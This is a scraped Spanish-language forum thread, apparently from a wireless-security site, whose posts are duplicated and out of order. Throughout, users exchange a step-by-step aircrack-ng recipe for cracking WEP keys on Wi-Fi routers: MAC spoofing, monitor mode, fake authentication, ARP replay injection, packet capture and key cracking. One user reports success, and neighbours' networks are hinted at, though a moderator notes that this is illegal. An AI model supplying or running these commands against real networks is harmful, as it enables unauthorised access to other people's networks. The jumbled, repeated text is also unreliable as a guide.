ifconfig rausb0 downSi si por el contrario no nos detecta el rt73 a estas lineas le añadimos:
macchanger -m 00:11:22:33:44:55 rausb0
rmmod rt73Para finalizar la configuracion de la tarjeta hacemos lo siguiente:
rmmod rt2570
modprobe rt73
ifconfig rausb0 upCon esto hecho podemos empezar a utilizar los programas especificos. Hacemos lo siguiente:
iwconfig rausb0 mode monitor
airodump-ng rausb0Con esto comprobamos cual es el canal de ap a atacar y tambien el bssid luego abrimos otra terminal y con el aireplay-ng hacemos de la siguiente forma:
aireplay-ng -1 30 -e Nombre_del_ap -a mac_del_ap -h 00:11:22:33:44:55 rausb0Y en otra terminal distinta hacemos lo siguiente:
aireplay-ng -3 -b mac_del_ap -h 00:11:22:33:44:55 rausb0Para finalizar en una terminal abrimos el airodump-ng de la siguinte forma:
airodump-ng -c canal_ap -w nombre_archivo rausb0Con esto lo que nos queda es esprar a que el aireplay-ng coja el arp. Para finalizar lo que tenemos que hacer es
aircrack-ng -z archivo.cap rausb0
iwconfig rausb0 rate 1M
rate/bit[rate]
For cards supporting multiple bit rates, set the bit-rate in b/s. The
bit-rate is the speed at which bits are transmitted over the medium, the user speed of the link is lower due to medium sharing and overhead.
You must append the suffix k, M or G to the value (decimal multiplier : 10^3, 10^6 and 10^9 b/s), or add enough '0'. Values below 1000 are card specific, usually an index in the bit-rate list. Use auto to select the automatic bit-rate mode (fallback to lower rate on noisy channels), which is the default for most cards, and fixed to revert back to fixed setting. If you specify a bit-rate value and append auto, the driver will use all bit lower and equal than this value.
Examples :
iwconfig eth0 rate 11M
iwconfig eth0 rate auto
iwconfig eth0 rate 5.5M auto
En primer luego deberias bajar el rate, es decirCódigo: [Seleccionar]iwconfig rausb0 rate 1M
Si el error continua es probable que sea por que te encuentres muy lejos del ap
hola
te respondo rapidamente.. tu interfase es usb osea esta identificada como rasub0...
el comando que tienes que poner es
aireplay -1 30 -e "el ssid" -a "el BSSID" -h 00:11:22:33:44:55 rausb0
ceo que te respondias solito.. pero por si las dudas..
saludos :) :) :) :) :) :)
Hola adrian_oca:
La "sentencia" (como me suena esa palabreja :P) que has puesto es para hacer un A1 esto es una asociación falsa... luego debes hacer un A3 que sirva para que los DATAS te suban esto es la inyección
aireplay-ng -3 -b MAC AP -h MAC CLIENTE FALSO rausb0 -x 1024
Si fuera cliente legítimo... lo mismo pero cambias el MAC FALSO por el MAC REAL....
Un saludo
ChimoC
Acabo de ver un video.
Ataque 1. Autenticacion FALSA. Por lo que veo se asocia y genera trafico el solo... creo que lo he echo, pero no genera ARP.
Para la inyeccion sin clientes suele ser necesario esperar bastante porque suele tardar, o tambien intentarlo varias veces hasta que funcione. Tambien suele ser necesario disponer de una señal bastante buena.
Leere con más atencion el post_fijo que parece que va hacer the_often, para optimizar la caza de routers sin cliente asociado. Como bajar a rate y otras pichadas ?¿?¿
The_often no va a hacer un tuto de como cazar routers .... Sino q va a hacer una guia sobre preguntas q estan ultra respondidas
Sobre lo del PWR no te fies demasiado ... hay veces q se pone a -1 ... y los ataques funcionan igual.
airodump-ng -c 11 -w x rausb0
Escribe:gracias,x fin alguien k se digna a decirmelo claro y raso,xa tontos vaya,jejeCitarairodump-ng -c 11 -w x rausb0
En donde x corresponde al nombre del archivo que desees
airodump-ng -c 11 -w prueba rausb0
aircrack-ptw prueba.cap
airodump-ng -c 11 -w prueba --ivs rausb0
aircrack-ng prueba.ivs
xk unbAs no me ha dicho nada de la -w y en el manual tampoko aparece?
Todo lo que dices es correcto, sin embargo si vas a utilizar aircrack-ptw (con el cual solo necesitas 50000 datas para una wep) pues tiene que ser un archivo .cap1000 gracias,aclarado del todo
Es decir puedes utilizar los siguiente pasos:
Primero(y mas efectivo)Citarairodump-ng -c 11 -w prueba rausb0
aircrack-ptw prueba.cap
SegundoCitarairodump-ng -c 11 -w prueba --ivs rausb0
aircrack-ng prueba.ivs
Lo primero que debemos hacer es un iwconfig para saber si no detecta el chip rt73 o rt2570, bueno si al lado de rausb0 no pone rt73 hacemos lo siguiente:Citarifconfig rausb0 downSi si por el contrario no nos detecta el rt73 a estas lineas le añadimos:
macchanger -m 00:11:22:33:44:55 rausb0Citarrmmod rt73Para finalizar la configuracion de la tarjeta hacemos lo siguiente:
rmmod rt2570
modprobe rt73Citarifconfig rausb0 upCon esto hecho podemos empezar a utilizar los programas especificos. Hacemos lo siguiente:
iwconfig rausb0 mode monitorCitarairodump-ng rausb0Con esto comprobamos cual es el canal de ap a atacar y tambien el bssid luego abrimos otra terminal y con el aireplay-ng hacemos de la siguiente forma:Citaraireplay-ng -1 30 -e Nombre_del_ap -a mac_del_ap -h 00:11:22:33:44:55 rausb0Y en otra terminal distinta hacemos lo siguiente:Citaraireplay-ng -3 -b mac_del_ap -h 00:11:22:33:44:55 rausb0Para finalizar en una terminal abrimos el airodump-ng de la siguinte forma:Citarairodump-ng -c canal_ap --ivs rausb0Con esto lo que nos queda es esprar a que el aireplay-ng coja el arp. Para finalizar lo que tenemos que hacer esCitaraircrack-ng archivo.ivs rausb0
Y Ya esta ;D ;D
k yo sepa aki no aparece nada de la -w.De todas formas os estoy muy agradecido xk entiendo k debe ser 1 coñazo explikarle todos los dias a alguien distinto la misma historia.Citarxk unbAs no me ha dicho nada de la -w y en el manual tampoko aparece?
Lo siento sabia que se me pasaba algo ... pero no supe que era ...
Pero en el manual biene bien explicadito ... sino no seria un manual ...ademas lo tienes en este mismo post al principio en las lineas de comandos que ha puesto hadrianweb ...
Mira el aircrack-ptw viene en la 3.0, si utilizas la 2.0 o bien te lo instalas o utilizas el aircrack-ngla 3 no me funciona,k raro,no?k la 2 funcione a la primera y la 3 ya me la he bajado 2 veces,he comprobado el md5,es correcto y nada de nada.
Exacto.. ya consegui una clave por medio del atake de a1+a3 :D Valla gustirrinin, y curiosimente como he leido, me fui RAPIDISIMO, inyectaba como un galgo, #/s a todo trapo 300
PWr= pone 90 98, eso que es sobre 100 ¿?¿
Uso el vmware en mi equipo, para seguir bajando del emule.
En el portatil uso el vmware 3.0 o 2.0
Como apenas se usar linux, y me interesaba hacer un video educativo, a lo mejor meto el vmware al portatil y hago la misma ñapa al mismo router (ataque de autentificacion falsa+ataque 3) y lo con el snag it.
s2 y gracias.
Leere con más atencion el post_fijo que parece que va hacer the_often, para optimizar la caza de routers sin cliente asociado. Como bajar a rate y otras pichadas ?¿?¿
No creo yo que el chip estea mal, pero recuerda que sule tardar en inyectar ese chip
A mi me surge un problema q me dice q no tengo permisos agradeceria alguna ayuda
Gracias.
Espero que sigas pasandote por el foro, pero recuerda lo dicho ;)
aircrack-ng -z
bueno, perdona entonces el mal entendido, si asi fue, entonces me disculpo.
Solo una sugerencia, utilizaste la opcionCitaraircrack-ng -z
para sacarla??
lo digo porque no es logico que necesites mas de 1 millon de datas, a no ser que no utilizaces esa opcion
En fin, y por si alguien le sirve de ayuda, cuidado con los baciles de los "admin"
trocanter
No se que te habra pasado, con hadrianweb ni por que te ha pedido disculpas.
Sobre el tema de los ve*inos, SI es ilegal ... que tengas su consentimiento o no, eso ya es otro cantar .... pero en principio es ilegal y como minimo avisamos, NO queremos tener problemas ......
Por otro lado sino te importa me gustaria que me aclarases esto:CitarEn fin, y por si alguien le sirve de ayuda, cuidado con los baciles de los "admin"
No se en que tono tomarmelo, aqui los administradores, moderadores, y colaboradores no pasamos muchas horas trabajando y ayudando ... por lo tanto "bacilar" creo que poco ......
1-. que esteas muy lejos
2-. que en algun comando estea mal puesto
3-. que tengas que bajar el rate (comando:iwconfig rausb0 rate 1M)
ifconfig rausb0 down
macchanger -m 00:11:22:33:44:55 rausb0
Si si por el contrario no nos detecta el rt73 a estas lineas le añadimos:
Citar
rmmod rt73
rmmod rt2570
modprobe rt73
Para finalizar la configuracion de la tarjeta hacemos lo siguiente:
Citar
ifconfig rausb0 up
iwconfig rausb0 mode monitor
Lo primero que debemos hacer es un iwconfig para saber si no detecta el chip rt73 o rt2570, bueno si al lado de rausb0 no pone rt73 hacemos lo siguiente:Citarifconfig rausb0 downSi si por el contrario no nos detecta el rt73 a estas lineas le añadimos:
macchanger -m 00:11:22:33:44:55 rausb0Citarrmmod rt73Para finalizar la configuracion de la tarjeta hacemos lo siguiente:
rmmod rt2570
modprobe rt73Citarifconfig rausb0 upCon esto hecho podemos empezar a utilizar los programas especificos. Hacemos lo siguiente:
iwconfig rausb0 mode monitorCitarairodump-ng rausb0Con esto comprobamos cual es el canal de ap a atacar y tambien el bssid luego abrimos otra terminal y con el aireplay-ng hacemos de la siguiente forma:Citaraireplay-ng -1 30 -e Nombre_del_ap -a mac_del_ap -h 00:11:22:33:44:55 rausb0Y en otra terminal distinta hacemos lo siguiente:Citaraireplay-ng -3 -b mac_del_ap -h 00:11:22:33:44:55 rausb0Para finalizar en una terminal abrimos el airodump-ng de la siguinte forma:Citarairodump-ng -c canal_ap -w nombre_archivo rausb0Con esto lo que nos queda es esprar a que el aireplay-ng coja el arp. Para finalizar lo que tenemos que hacer esCitaraircrack-ng -z archivo.cap rausb0
Y Ya esta ;D ;D
He seguido esto paso a paso y no consigo conectar. Se me queda en eso de sending authentication request y de ahi no paso. Tengo un adaptador wifi asus w167-g. ¿Que es lo que puede pasar?
Gracias
Buenas:
Mmmm..... mmmmm
Como dicen en mi pueblo "verde y con asas"
Un saludo
ChimoC
20:40:20 Sending Authentication Request
20:40:22 Sending Authentication Request
20:32:38 Packets per second adjusted to 3
write failed: Resource temporarily unavailable
aircrack-ptw archivo.cap
a pesar de probarlo incluso con el mio propio
lo primero de todo te recomendaría una cosita :Cita de: zholvexa pesar de probarlo incluso con el mio propio
https://foro.seguridadwireless.net/index.php/topic,6093.0.html (https://foro.seguridadwireless.net/index.php/topic,6093.0.html)
que creo que no leemos bien las cosas y luego nos llevamos un disgusto ...
de todas formas con tanta información no se ni que hacer ... ^-^ ^-^
Si pusieras los comandos que utilizas , quizás ... de todos modos espero que la advertencia que te doy con ese enlace no caiga en saco roto ...
Saludos
ifconfig rausb0 down
macchanger -m 00:11:22:33:44:55 rausb0
ifconfig rausb0 up
iwconfig rausb0 mode monitor
Una vez configurada escaneo:
airodump-ng rausb0
aireplay-ng -1 30 -e Nombre_del_ap -a mac_del_ap -h 00:11:22:33:44:55 rausb0
aireplay-ng -3 -b mac_del_ap -h 00:11:22:33:44:55 rausb0
airodump-ng -c canal_ap –w datos rausb0
iwconfig rausb0 rate 1M
los comandos en principio están bien ... pero por ejemplo
aireplay-ng -3 -x600 -b mac_del_ap -h 00:11:22:33:44:55 rausb0
también te comento que en muchos casos el cambio de mac no ayuda demasiado , simplemente el Ap no se lo cree y andando , prueba con la mac original ...
P.D. por lo menos se entienden las normas ... me alegro ;)